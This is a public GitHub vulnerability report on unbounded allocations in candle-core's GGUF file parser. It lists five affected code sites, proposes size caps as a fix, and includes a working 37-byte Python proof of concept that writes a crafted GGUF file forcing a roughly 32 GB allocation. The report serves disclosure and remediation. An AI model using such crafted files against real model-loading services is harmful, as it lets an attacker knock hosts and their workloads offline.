Skip to content

Unguarded allocation sites in candle-core/src/quantized/gguf_file.rs (DoS via crafted GGUF) #3533

@UNILESS

Description

@UNILESS

Filing this publicly because the repo does not currently have Private Vulnerability Reporting enabled. Happy to move to a private channel if preferred — please enable PVR on the repo and let me know.

Summary

candle-core/src/quantized/gguf_file.rs (current main, commit 24b0b28+) reads several length / count fields from a GGUF file as u32/u64 and uses them directly as the size argument of vec![T; n], Vec::with_capacity(n), and for _ in 0..n loops with no upper-bound check. A small (< 64-byte) GGUF file that declares 2^32 items drives the loader into multi-GB allocation or extremely long iteration, killing the host or its inference workload.

Same bug class as CVE-2025-66960 (ollama fs/ggml/gguf.go, fixed). In candle, the same pattern recurs across five sites. The sibling crate safetensors in the same org explicitly caps with MAX_HEADER_SIZE + buffer.get slicing — candle's GGUF loader did not adopt that pattern.

Affected sites

All in candle-core/src/quantized/gguf_file.rs:

(a) L99 — read_string length buffer:

let len = match magic {
    VersionedMagic::GgufV1 => reader.read_u32::<LittleEndian>()? as usize,
    VersionedMagic::GgufV2 | VersionedMagic::GgufV3 => {
        reader.read_u64::<LittleEndian>()? as usize
    }
};
let mut v = vec![0u8; len];        // <-- immediate physical alloc of `len` bytes
reader.read_exact(&mut v)?;

vec![0u8; len] is a committed allocation, not a virtual reservation. len = 2^32 → 4 GB RSS immediately.

(b) L306 — Value::read ARRAY branch:

let len = match magic { ... };
let mut vs = Vec::with_capacity(len);
for _ in 0..len {
    vs.push(Value::read(reader, value_type, magic)?)
}

(c) L421 — tensor_count outer loop:

let tensor_count = ... reader.read_u64::<LittleEndian>()? as usize;
for _idx in 0..tensor_count {
    let tensor_name = read_string(reader, &magic)?;
    ...
}

(d) L413 — metadata_kv_count: Same shape as (c).

(e) L427 / L432 — tensor dimensions vector:

let n_dimensions = reader.read_u32::<LittleEndian>()?;
let mut dimensions = vec![0; n_dimensions as usize];    // <-- alloc
reader.read_u32_into::<LittleEndian>(&mut dimensions)?;

Vec<usize> so 8 bytes/element. n_dimensions = 2^32 − 1 → ~32 GB immediate alloc.

Reachability

gguf_file::Content::read is the canonical entry for loading any GGUF model. Any application that loads a user-supplied or hub-downloaded GGUF traverses these sites.

Minimal PoC — 37 bytes

import struct
malicious = (
    b'GGUF'
    + struct.pack('<I', 3)
    + struct.pack('<Q', 1)               # tensor_count = 1
    + struct.pack('<Q', 0)               # kv_count = 0
    + struct.pack('<Q', 1) + b't'        # name = 't'
    + struct.pack('<I', 0xFFFFFFFF)      # n_dimensions = 2^32 - 1
)
open('/tmp/evil.gguf', 'wb').write(malicious)
use candle_core::quantized::gguf_file;
use std::fs::File;
let mut f = File::open("/tmp/evil.gguf").unwrap();
let _ = gguf_file::Content::read(&mut f);
// attempts vec![0; (2^32-1)] (Vec<usize>) = ~32 GB

Suggested fix

Mirror the safetensors pattern. Define caps and gate each allocation:

const GGUF_MAX_ARRAY_ELEMENTS: usize = 1 << 30;
const GGUF_MAX_STRING_LENGTH:  usize = 1 << 26;
const GGUF_MAX_TENSOR_DIMS:    usize = 8;

fn read_string<R: Read>(reader: &mut R, magic: &VersionedMagic) -> Result<String> {
    let len = ...;
    if len > GGUF_MAX_STRING_LENGTH {
        crate::bail!("GGUF string length {len} exceeds max {GGUF_MAX_STRING_LENGTH}")
    }
    let mut v = vec![0u8; len];
    reader.read_exact(&mut v)?;
    ...
}

Equivalent gates at L306, L413, L421, L427. The C++ baseline ggml/src/gguf.cpp enforces the same caps after PR ggml-org/llama.cpp#19856.

Regression tests should cover each site with an oversized value and assert that the parser returns Err (not OOM).

CWE

  • CWE-770 (Allocation of Resources Without Limits or Throttling)
  • CWE-1284 (Improper Validation of Specified Quantity in Input)
  • CWE-400 (Uncontrolled Resource Consumption)

CVE

If a CVE assignment is in scope here, happy to coordinate.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions